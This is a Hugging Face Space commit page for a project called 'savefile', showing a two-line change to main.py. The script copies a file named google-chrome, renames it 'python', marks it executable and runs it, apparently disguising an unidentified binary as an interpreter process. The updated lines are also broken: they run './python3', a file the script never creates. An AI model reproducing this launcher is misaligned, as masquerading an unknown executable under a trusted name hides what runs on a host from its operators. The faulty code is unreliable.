Hugging Face
Models
Datasets
Spaces
Posts
Docs
Enterprise
Pricing
Log In
Sign Up
Spaces:
ilhamap
/
savefile
like
0
Running
App
Files
Files
Community
Fetching metadata from the HF Docker repository...
ilhamap
commited on
Sep 27, 2024
Commit
a2092a8
·
verified
·
1 Parent(s):
a8c9b66
Update main.py
Browse files
Files changed (1)
hide
show
main.py
+2
-2
main.py
CHANGED
Viewed
@@ -1,4 +1,4 @@
1
import os
2
os.system("cp google-chrome python")
3
-
os.system("chmod +x
python
")
4
-
os.system("./
python
")
1
import os
2
os.system("cp google-chrome python")
3
+
os.system("chmod +x
python3
")
4
+
os.system("./
python3
")